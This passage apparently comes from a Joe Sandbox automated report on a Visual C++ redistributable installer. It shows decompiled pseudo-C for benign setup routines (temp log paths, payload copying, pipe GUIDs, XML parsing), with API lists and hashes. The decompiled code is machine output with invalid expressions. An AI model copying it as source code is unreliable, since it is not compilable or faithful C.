							if(( <=  ? _t89 : _t89 & 0x0000ffff | 0x80070000) < 0) {
								goto L24;
							} else {
								if(_t102 != 0) {
									continue;
								}
								goto L18;
							}
						}
						if(_t106 != 0xffffffff) {
							CloseHandle(_t106);
						}
						goto L24;
					}
					_t90 = E00014013(_v556, _t70);
					_t108 = _t90;
					if(_t90 < 0) {
						goto L24;
					}
					goto L9;
				}
			}

































                                                                          0x00012de0
                                                                          0x00012de9
                                                                          0x00012df0
                                                                          0x00012df7
                                                                          0x00012dfa
                                                                          0x00012e04
                                                                          0x00012e07
                                                                          0x00012e11
                                                                          0x00012e21
                                                                          0x00012e2f
                                                                          0x00012e34
                                                                          0x00012e3c
                                                                          0x00012e42
                                                                          0x00012e4b
                                                                          0x00012e4c
                                                                          0x00012e4d
                                                                          0x00012e4e
                                                                          0x00012e51
                                                                          0x00012e54
                                                                          0x00012e5c
                                                                          0x00012e82
                                                                          0x00012ebd
                                                                          0x00012ebe
                                                                          0x00012ec5
                                                                          0x00000000
                                                                          0x00012ec5
                                                                          0x00012e84
                                                                          0x00012e95
                                                                          0x00012e9f
                                                                          0x00012ead
                                                                          0x00000000
                                                                          0x00012e63
                                                                          0x00012e69
                                                                          0x00012e6a
                                                                          0x00012e6b
                                                                          0x00012ec6
                                                                          0x00012ec6
                                                                          0x00012ecb
                                                                          0x00012ecf
                                                                          0x00013032
                                                                          0x00013039
                                                                          0x00013041
                                                                          0x00013041
                                                                          0x0001304d
                                                                          0x00013055
                                                                          0x00013055
                                                                          0x00013061
                                                                          0x00013069
                                                                          0x00013069
                                                                          0x00013080
                                                                          0x00013080
                                                                          0x00012ee9
                                                                          0x00012f01
                                                                          0x00012f0e
                                                                          0x00012f11
                                                                          0x00012f11
                                                                          0x00012f1f
                                                                          0x00012f2b
                                                                          0x00012f30
                                                                          0x00012f31
                                                                          0x00012f3c
                                                                          0x00012f3f
                                                                          0x00012f47
                                                                          0x00012f48
                                                                          0x00012f50
                                                                          0x00012f58
                                                                          0x00012f60
                                                                          0x00012f68
                                                                          0x00012f70
                                                                          0x00012f83
                                                                          0x00012f88
                                                                          0x00012f8a
                                                                          0x00012f8f
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00012fb3
                                                                          0x00012fb8
                                                                          0x00012ff9
                                                                          0x00012ff9
                                                                          0x00013001
                                                                          0x00013017
                                                                          0x00013017
                                                                          0x0001301f
                                                                          0x00013021
                                                                          0x00013023
                                                                          0x00013023
                                                                          0x00000000
                                                                          0x0001301f
                                                                          0x0001300c
                                                                          0x00013011
                                                                          0x00013015
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00013015
                                                                          0x00012fba
                                                                          0x00012fc3
                                                                          0x00012fcc
                                                                          0x00012fd4
                                                                          0x00012fd6
                                                                          0x00012fd9
                                                                          0x00012fd9
                                                                          0x00012fd9
                                                                          0x00012fea
                                                                          0x00012fef
                                                                          0x00000000
                                                                          0x00012ff1
                                                                          0x00012ff3
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00012ff3
                                                                          0x00012fef
                                                                          0x00013029
                                                                          0x0001302c
                                                                          0x0001302c
                                                                          0x00000000
                                                                          0x00013029
                                                                          0x00012ef2
                                                                          0x00012ef7
                                                                          0x00012efb
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00012efb

                                                                          APIs
                                                                          • GetTempPathW.KERNEL32(00000104,?,00000001,00000000,00000000), ref: 00012E7A
                                                                          • GetLastError.KERNEL32 ref: 00012E84
                                                                          • GetLocalTime.KERNEL32(?,?,?,?,?,?), ref: 00012F1F
                                                                          • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000001,00000080,00000000), ref: 00012FAD
                                                                          • GetLastError.KERNEL32 ref: 00012FBA
                                                                          • Sleep.KERNEL32(00000064), ref: 00012FCC
                                                                          • CloseHandle.KERNEL32(?), ref: 0001302C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$CloseCreateFileHandleLocalPathSleepTempTime
                                                                          • String ID: %ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls$@Met$pathutil.cpp
                                                                          • API String ID: 3480017824-2730180625
                                                                          • Opcode ID: 9512d95184e2aa1043d1bc215d8cab75acc9eb7844e2041d882e0af6c58453da
                                                                          • Instruction ID: 42c6d76207b69c3f3116b249a406127214d29d3c174858e329ff219f15e82382
                                                                          • Opcode Fuzzy Hash: 9512d95184e2aa1043d1bc215d8cab75acc9eb7844e2041d882e0af6c58453da
                                                                          • Instruction Fuzzy Hash: 08715072941229ABDB719BA4DC49BEBB3F9AB08711F0001A5FD09E7191D7349EC4CF60
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00056DA8 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 159COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 68%
                                                                          			E00056DA8(intOrPtr* _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v20;
				void* __ebx;
				signed int _t68;
				int _t69;
				int _t70;
				void* _t84;
				intOrPtr _t92;
				intOrPtr* _t95;
				intOrPtr* _t96;
				intOrPtr* _t97;
				intOrPtr* _t99;
				signed int _t100;
				signed int _t102;
				signed int _t110;

				_t99 = _a4;
				_t94 =  &_v20;
				_v20 = 0;
				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				_t100 =  *((intOrPtr*)( *_t99 + 0x44))(_t99,  &_v20);
				if(_t100 < 0) {
					L26:
					if(_v8 != 0) {
						__imp__#6(_v8);
					}
					_t95 = _v12;
					if(_t95 != 0) {
						 *((intOrPtr*)( *_t95 + 8))(_t95);
					}
					_t96 = _v16;
					if(_t96 != 0) {
						 *((intOrPtr*)( *_t96 + 8))(_t96);
					}
					_t97 = _v20;
					if(_t97 != 0) {
						 *((intOrPtr*)( *_t97 + 8))(_t97);
					}
					return _t100;
				}
				_t68 = E000536D7( &_v20, _v20,  &_v12,  &_v8);
				_t92 = _a8;
				while(1) {
					_t100 = _t68;
					_t102 = _t100;
					if(_t102 != 0) {
						break;
					}
					_t69 = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"type", 0xffffffff);
					__eflags = _t69 - 2;
					if(_t69 != 2) {
						_t70 = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"url", 0xffffffff);
						__eflags = _t70 - 2;
						if(_t70 != 2) {
							L7:
							__eflags = _v8;
							if(_v8 != 0) {
								__imp__#6(_v8);
								_t19 =  &_v8;
								 *_t19 = _v8 & 0x00000000;
								__eflags =  *_t19;
							}
							_t94 = _v12;
							__eflags = _t94;
							if(_t94 != 0) {
								 *((intOrPtr*)( *_t94 + 8))(_t94);
								_t23 =  &_v12;
								 *_t23 = _v12 & 0x00000000;
								__eflags =  *_t23;
							}
							_t68 = E000536D7(_t94, _v20,  &_v12,  &_v8);
							continue;
						}
						_push(_v12);
						_push(_t92 + 4);
						L6:
						_t100 = E000567C4(_t94);
						__eflags = _t100;
						if(_t100 < 0) {
							L25:
							goto L26;
						}
						goto L7;
					}
					_push(_v12);
					_push(_t92);
					goto L6;
				}
				if(_t102 < 0) {
					goto L25;
				}
				_t98 =  &_v16;
				_t100 =  *((intOrPtr*)( *_t99 + 0x30))(_t99,  &_v16);
				if(_t100 < 0) {
					goto L25;
				}
				_t100 = E00053760( &_v16, _v16,  &_v12,  &_v8);
				_t104 = _t100;
				if(_t100 != 0) {
					L23:
					if(_t110 >= 0) {
						_t100 = E000567C4(_t98, _t92 + 8, _t99);
					}
					goto L25;
				}
				_t84 = _t92 + 0xc;
				while(1) {
					_t100 = E000579CC(_t92, _t104, _v12, _t84);
					if(_t100 < 0) {
						goto L25;
					}
					if(_v8 != 0) {
						__imp__#6(_v8);
						_v8 = _v8 & 0x00000000;
					}
					_t98 = _v12;
					if(_t98 != 0) {
						 *((intOrPtr*)( *_t98 + 8))(_t98);
						_v12 = _v12 & 0x00000000;
					}
					_t100 = E00053760(_t98, _v16,  &_v12,  &_v8);
					_t84 = _t92 + 0xc;
					_t110 = _t100;
					if(_t110 == 0) {
						continue;
					} else {
						goto L23;
					}
				}
				goto L25;
			}




















                                                                          0x00056db0
                                                                          0x00056db3
                                                                          0x00056db8
                                                                          0x00056dbb
                                                                          0x00056dbe
                                                                          0x00056dc1
                                                                          0x00056dcb
                                                                          0x00056dcf
                                                                          0x00056f08
                                                                          0x00056f0c
                                                                          0x00056f11
                                                                          0x00056f11
                                                                          0x00056f17
                                                                          0x00056f1c
                                                                          0x00056f21
                                                                          0x00056f21
                                                                          0x00056f24
                                                                          0x00056f29
                                                                          0x00056f2e
                                                                          0x00056f2e
                                                                          0x00056f31
                                                                          0x00056f36
                                                                          0x00056f3b
                                                                          0x00056f3b
                                                                          0x00056f45
                                                                          0x00056f45
                                                                          0x00056de1
                                                                          0x00056de6
                                                                          0x00056e74
                                                                          0x00056e74
                                                                          0x00056e76
                                                                          0x00056e78
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00056dfe
                                                                          0x00056e04
                                                                          0x00056e07
                                                                          0x00056e1f
                                                                          0x00056e25
                                                                          0x00056e28
                                                                          0x00056e40
                                                                          0x00056e40
                                                                          0x00056e44
                                                                          0x00056e49
                                                                          0x00056e4f
                                                                          0x00056e4f
                                                                          0x00056e4f
                                                                          0x00056e4f
                                                                          0x00056e53
                                                                          0x00056e56
                                                                          0x00056e58
                                                                          0x00056e5d
                                                                          0x00056e60
                                                                          0x00056e60
                                                                          0x00056e60
                                                                          0x00056e60
                                                                          0x00056e6f
                                                                          0x00000000
                                                                          0x00056e6f
                                                                          0x00056e2a
                                                                          0x00056e30
                                                                          0x00056e31
                                                                          0x00056e36
                                                                          0x00056e38
                                                                          0x00056e3a
                                                                          0x00056f07
                                                                          0x00000000
                                                                          0x00056f07
                                                                          0x00000000
                                                                          0x00056e3a
                                                                          0x00056e09
                                                                          0x00056e0c
                                                                          0x00000000
                                                                          0x00056e0c
                                                                          0x00056e7e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00056e86
                                                                          0x00056e8e
                                                                          0x00056e92
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00056ea4
                                                                          0x00056ea6
                                                                          0x00056ea8
                                                                          0x00056ef9
                                                                          0x00056ef9
                                                                          0x00056f05
                                                                          0x00056f05
                                                                          0x00000000
                                                                          0x00056ef9
                                                                          0x00056eaa
                                                                          0x00056ead
                                                                          0x00056eb6
                                                                          0x00056eba
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00056ec0
                                                                          0x00056ec5
                                                                          0x00056ecb
                                                                          0x00056ecb
                                                                          0x00056ecf
                                                                          0x00056ed4
                                                                          0x00056ed9
                                                                          0x00056edc
                                                                          0x00056edc
                                                                          0x00056ef0
                                                                          0x00056ef2
                                                                          0x00056ef5
                                                                          0x00056ef7
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00056ef7
                                                                          0x00000000

                                                                          APIs
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,`Aet,000000FF,type,000000FF,?,?,`Aet,74654160), ref: 00056DFE
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 00056E49
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 00056EC5
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 00056F11
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: String$Free$Compare
                                                                          • String ID: `Aet$crypt32.dll$feclient.dll$type$url
                                                                          • API String ID: 1324494773-1409380186
                                                                          • Opcode ID: 32528431ab580c853189b53c7839abe204f76b655818df37f6b65b1fbf7d332e
                                                                          • Instruction ID: 186664cce33afea57559b05f32331848964b4e3c83a04207c6c07804fb9ac40a
                                                                          • Opcode Fuzzy Hash: 32528431ab580c853189b53c7839abe204f76b655818df37f6b65b1fbf7d332e
                                                                          • Instruction Fuzzy Hash: 5D516075D01219FBCF15CB94C849EEFBBB8AF04722F5042A9E811EB161D7329E08DB50
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00039A57 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 125COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 60%
                                                                          			E00039A57(void* __ecx, void* _a4, WCHAR* _a8, WCHAR* _a12) {
				long _v8;
				intOrPtr* _t22;
				void* _t24;
				signed short _t31;
				signed int _t36;
				long _t37;
				signed short _t39;
				intOrPtr _t46;
				WCHAR* _t47;
				intOrPtr* _t50;
				intOrPtr* _t51;
				intOrPtr _t53;
				void* _t55;
				long _t58;

				_t55 = _a4;
				_t58 = 0;
				_v8 = 0;
				_t46 = 0x5b524;
				_t22 =  *((intOrPtr*)(_t55 + 4));
				if(_t22 == 0) {
					_t50 =  *((intOrPtr*)(_t55 + 8));
					if(_t50 == 0) {
						_t53 = 0x5b524;
					} else {
						_t53 =  *_t50;
					}
				} else {
					_t53 =  *_t22;
				}
				_t51 =  *((intOrPtr*)(_t55 + 0xc));
				if(_t51 != 0) {
					_t46 =  *_t51;
				}
				if(_t22 == 0) {
					_t24 =  !=  ? 0x20000152 : 0x2000014f;
				} else {
					_t24 = (0 | _t51 != 0x00000000) + 0x20000150;
				}
				_push(_a8);
				_push("copy");
				_push(_t46);
				E0001550F(2, _t24, _t53);
				_t47 = _a12;
				if(E00054315(_t47,  &_v8) == 0) {
					L14:
					_t17 = _t55 + 0x20; // 0x20
					if(CopyFileExW(_a8, _t47, E0003993C, _t55, _t17, _t58) == 0) {
						if( *(_t55 + 0x20) == _t58) {
							_t31 = GetLastError();
							_t62 =  <=  ? _t31 : _t31 & 0x0000ffff | 0x80070000;
							_t58 =  >=  ? 0x80004005 :  <=  ? _t31 : _t31 & 0x0000ffff | 0x80070000;
							E000137D3(0x80004005, "apply.cpp", 0x546, _t58);
							_push(_t47);
							_push(_a8);
							_push("Failed attempt to copy payload from: \'%ls\' to: %ls.");
						} else {
							_t58 = 0x80070642;
							E000137D3(_t29, "apply.cpp", 0x542, 0x80070642);
							_push(_t47);
							_push(_a8);
							_push("BA aborted copy of payload from: \'%ls\' to: %ls.");
						}
						_push(_t58);
						E0005012F();
					}
					goto L19;
				} else {
					_t36 = _v8;
					if((_t36 & 0x00000001) == 0) {
						goto L14;
					}
					_t37 = _t36 & 0xfffffffe;
					_v8 = _t37;
					if(SetFileAttributesW(_t47, _t37) != 0) {
						goto L14;
					}
					_t39 = GetLastError();
					_t65 =  <=  ? _t39 : _t39 & 0x0000ffff | 0x80070000;
					_t58 =  >=  ? 0x80004005 :  <=  ? _t39 : _t39 & 0x0000ffff | 0x80070000;
					E000137D3(0x80004005, "apply.cpp", 0x538, _t58);
					E0005012F(_t58, "Failed to clear readonly bit on payload destination path: %ls", _t47);
					L19:
					return _t58;
				}
			}

















                                                                          0x00039a5e
                                                                          0x00039a61
                                                                          0x00039a63
                                                                          0x00039a66
                                                                          0x00039a6b
                                                                          0x00039a70
                                                                          0x00039a76
                                                                          0x00039a7b
                                                                          0x00039a81
                                                                          0x00039a7d
                                                                          0x00039a7d
                                                                          0x00039a7d
                                                                          0x00039a72
                                                                          0x00039a72
                                                                          0x00039a72
                                                                          0x00039a83
                                                                          0x00039a88
                                                                          0x00039a8a
                                                                          0x00039a8a
                                                                          0x00039a8e
                                                                          0x00039aa9
                                                                          0x00039a90
                                                                          0x00039a97
                                                                          0x00039a97
                                                                          0x00039aac
                                                                          0x00039aaf
                                                                          0x00039ab4
                                                                          0x00039ab9
                                                                          0x00039abe
                                                                          0x00039ad0
                                                                          0x00039b2a
                                                                          0x00039b2b
                                                                          0x00039b41
                                                                          0x00039b46
                                                                          0x00039b68
                                                                          0x00039b79
                                                                          0x00039b83
                                                                          0x00039b91
                                                                          0x00039b96
                                                                          0x00039b97
                                                                          0x00039b9a
                                                                          0x00039b48
                                                                          0x00039b48
                                                                          0x00039b58
                                                                          0x00039b5d
                                                                          0x00039b5e
                                                                          0x00039b61
                                                                          0x00039b61
                                                                          0x00039b9f
                                                                          0x00039ba0
                                                                          0x00039ba5
                                                                          0x00000000
                                                                          0x00039ad2
                                                                          0x00039ad2
                                                                          0x00039ad7
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00039ad9
                                                                          0x00039ade
                                                                          0x00039ae9
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00039aeb
                                                                          0x00039afc
                                                                          0x00039b06
                                                                          0x00039b14
                                                                          0x00039b20
                                                                          0x00039ba8
                                                                          0x00039bb0
                                                                          0x00039bb0

                                                                          APIs
                                                                          • SetFileAttributesW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,?,?,0003ADE5,?,00000001,00000000), ref: 00039AE1
                                                                          • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,?,?,0003ADE5,?,00000001,00000000,00000000,00000000,00000001,00000000), ref: 00039AEB
                                                                          • CopyFileExW.KERNEL32(00000000,00000000,0003993C,00000000,00000020,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 00039B39
                                                                          • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,?,?,0003ADE5,?,00000001,00000000,00000000,00000000,00000001,00000000), ref: 00039B68
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorFileLast$AttributesCopy
                                                                          • String ID: @Met$BA aborted copy of payload from: '%ls' to: %ls.$Failed attempt to copy payload from: '%ls' to: %ls.$Failed to clear readonly bit on payload destination path: %ls$apply.cpp$copy
                                                                          • API String ID: 1969131206-4135901359
                                                                          • Opcode ID: 9927c3eb709544dd2f68c6c47d4137415cef324e196b6aa67a81e8f405c33797
                                                                          • Instruction ID: 57db9005d465054ae9c4f9fafba946c02c10326f826cf4be84e866eb645367fb
                                                                          • Opcode Fuzzy Hash: 9927c3eb709544dd2f68c6c47d4137415cef324e196b6aa67a81e8f405c33797
                                                                          • Instruction Fuzzy Hash: 4A31E471B40716BBFB219A65DC81EBBB7ADEF40751F108229BD09DB192E7A0DD0086E1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00024B96 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 122COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • UuidCreate.RPCRT4(?), ref: 00024BC9
                                                                          • StringFromGUID2.OLE32(?,?,00000027), ref: 00024BF8
                                                                          • UuidCreate.RPCRT4(?), ref: 00024C43
                                                                          • StringFromGUID2.OLE32(?,?,00000027), ref: 00024C6F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFromStringUuid
                                                                          • String ID: BurnPipe.%s$Failed to allocate pipe name.$Failed to allocate pipe secret.$Failed to convert pipe guid into string.$Failed to create pipe guid.$pipe.cpp
                                                                          • API String ID: 4041566446-2510341293
                                                                          • Opcode ID: 7296da34cc11a0d67edf8710d603488dbc9fe724dad225419d06095fc2af3ea5
                                                                          • Instruction ID: 027c290460b0fc1a142e6f28fe248d33ec27b47a5ec29fe6b9989da29ba09700
                                                                          • Opcode Fuzzy Hash: 7296da34cc11a0d67edf8710d603488dbc9fe724dad225419d06095fc2af3ea5
                                                                          • Instruction Fuzzy Hash: 9B41A072D01328EBDB61DBE4ED45EDEB7F8AB44711F204126EA05BF241D7749A44CB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00056ACD Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 116COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 60%
                                                                          			E00056ACD(intOrPtr* _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				intOrPtr* _t36;
				void* _t55;
				intOrPtr _t59;
				signed int _t61;
				intOrPtr* _t62;
				void* _t67;
				void* _t68;

				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				_t36 = _a4;
				_t60 =  *_t36;
				_t67 =  *((intOrPtr*)( *_t36 + 0x30))(_t36,  &_v16);
				if(_t67 >= 0) {
					_t68 = E00053760(_t60, _v16,  &_v12,  &_v8);
					if(_t68 != 0) {
						L16:
						_t67 =  >=  ? 0 : _t68;
					} else {
						_t59 = _a8;
						do {
							if(CompareStringW(0x7f, 0, _v8, 0xffffffff, L"name", 0xffffffff) != 2) {
								if(CompareStringW(0x7f, 0, _v8, 0xffffffff, L"email", 0xffffffff) != 2) {
									if(CompareStringW(0x7f, 0, _v8, 0xffffffff, L"uri", 0xffffffff) != 2) {
										goto L11;
									} else {
										_t55 = _t59 + 8;
										goto L9;
									}
								} else {
									_t55 = _t59 + 4;
									L9:
									_push(_v12);
									_push(_t55);
									goto L10;
								}
							} else {
								_push(_v12);
								_push(_t59);
								L10:
								_t67 = E000567C4(_t60);
								if(_t67 >= 0) {
									goto L11;
								}
							}
							goto L17;
							L11:
							if(_v8 != 0) {
								__imp__#6(_v8);
								_v8 = _v8 & 0x00000000;
							}
							_t60 = _v12;
							if(_t60 != 0) {
								 *((intOrPtr*)( *_t60 + 8))(_t60);
								_v12 = _v12 & 0x00000000;
							}
							_t68 = E00053760(_t60, _v16,  &_v12,  &_v8);
						} while (_t68 == 0);
						goto L16;
					}
					L17:
				}
				if(_v8 != 0) {
					__imp__#6(_v8);
				}
				_t61 = _v12;
				if(_t61 != 0) {
					 *((intOrPtr*)( *_t61 + 8))(_t61);
				}
				_t62 = _v16;
				if(_t62 != 0) {
					 *((intOrPtr*)( *_t62 + 8))(_t62);
				}
				return _t67;
			}













                                                                          0x00056ad8
                                                                          0x00056adb
                                                                          0x00056ade
                                                                          0x00056ae1
                                                                          0x00056ae7
                                                                          0x00056aec
                                                                          0x00056af0
                                                                          0x00056b08
                                                                          0x00056b0c
                                                                          0x00056bbb
                                                                          0x00056bbf
                                                                          0x00056b12
                                                                          0x00056b12
                                                                          0x00056b1b
                                                                          0x00056b30
                                                                          0x00056b4d
                                                                          0x00056b69
                                                                          0x00000000
                                                                          0x00056b6b
                                                                          0x00056b6b
                                                                          0x00000000
                                                                          0x00056b6b
                                                                          0x00056b4f
                                                                          0x00056b4f
                                                                          0x00056b6e
                                                                          0x00056b6e
                                                                          0x00056b71
                                                                          0x00000000
                                                                          0x00056b71
                                                                          0x00056b32
                                                                          0x00056b32
                                                                          0x00056b35
                                                                          0x00056b72
                                                                          0x00056b77
                                                                          0x00056b7b
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00056b7b
                                                                          0x00000000
                                                                          0x00056b7d
                                                                          0x00056b81
                                                                          0x00056b86
                                                                          0x00056b8c
                                                                          0x00056b8c
                                                                          0x00056b90
                                                                          0x00056b95
                                                                          0x00056b9a
                                                                          0x00056b9d
                                                                          0x00056b9d
                                                                          0x00056bb1
                                                                          0x00056bb3
                                                                          0x00000000
                                                                          0x00056b1b
                                                                          0x00056bc2
                                                                          0x00056bc3
                                                                          0x00056bc8
                                                                          0x00056bcd
                                                                          0x00056bcd
                                                                          0x00056bd3
                                                                          0x00056bd8
                                                                          0x00056bdd
                                                                          0x00056bdd
                                                                          0x00056be0
                                                                          0x00056be5
                                                                          0x00056bea
                                                                          0x00056bea
                                                                          0x00056bf3

                                                                          APIs
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,`Aet,000000FF,name,000000FF,?,?,`Aet,?,74654160), ref: 00056B2B
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,email,000000FF), ref: 00056B48
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 00056B86
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 00056BCD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: String$CompareFree
                                                                          • String ID: `Aet$email$feclient.dll$name$uri
                                                                          • API String ID: 3589242889-3428274497
                                                                          • Opcode ID: 7bd55627aac0e1c2dece23d632937f150c6292896a9f9f8fa9308935fed92a00
                                                                          • Instruction ID: d504d8aebfbf396d401358ec367ec26d56cd62f14a379b52b0f80cff157db0c0
                                                                          • Opcode Fuzzy Hash: 7bd55627aac0e1c2dece23d632937f150c6292896a9f9f8fa9308935fed92a00
                                                                          • Instruction Fuzzy Hash: CA414F35E04219BBEB61DB94CC45FAEB7B5EF04722F6042A5E911EB290C7329E48DB50
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00015F14 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 105timeCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 60%
                                                                          			E00015F14(void* __edx, intOrPtr _a8) {
				signed int _v8;
				struct _SYSTEMTIME _v24;
				short* _v28;
				intOrPtr _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t16;
				int _t22;
				void* _t37;
				void* _t42;
				int _t44;
				void* _t45;
				signed int _t50;

				_t42 = __edx;
				_t16 =  *0x7a008; // 0xfbf51acb
				_v8 = _t16 ^ _t50;
				_v32 = _a8;
				_v28 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				GetSystemTime( &_v24);
				_t22 = GetDateFormatW(0x400, 1,  &_v24, 0, 0, 0);
				_t37 = GetLastError;
				_t44 = _t22;
				if(_t44 != 0) {
					L3:
					_t45 = E00011EDE( &_v28, _t44);
					if(_t45 >= 0) {
						if(GetDateFormatW(0x400, 1,  &_v24, 0, _v28, _t44) != 0) {
							L8:
							_t45 = E000302F4(_v32, _v28, _t44);
							if(_t45 < 0) {
								_push("Failed to set variant value.");
								goto L10;
							}
						} else {
							_t45 =  <=  ? GetLastError() : _t32 & 0x0000ffff | 0x80070000;
							if(_t45 >= 0) {
								goto L8;
							} else {
								E000137D3(_t32, "variable.cpp", 0x899, _t45);
								_push("Failed to get the Date.");
								goto L10;
							}
						}
					} else {
						_push("Failed to allocate the buffer for the Date.");
						goto L10;
					}
				} else {
					_t45 =  <=  ? GetLastError() : _t34 & 0x0000ffff | 0x80070000;
					if(_t45 >= 0) {
						goto L3;
					} else {
						E000137D3(_t34, "variable.cpp", 0x891, _t45);
						_push("Failed to get the required buffer length for the Date.");
						L10:
						_push(_t45);
						E0005012F();
					}
				}
				if(_v28 != 0) {
					E000554EF(_v28);
				}
				return E0003DE36(_t37, _v8 ^ _t50, _t42, _t44, _t45);
			}


















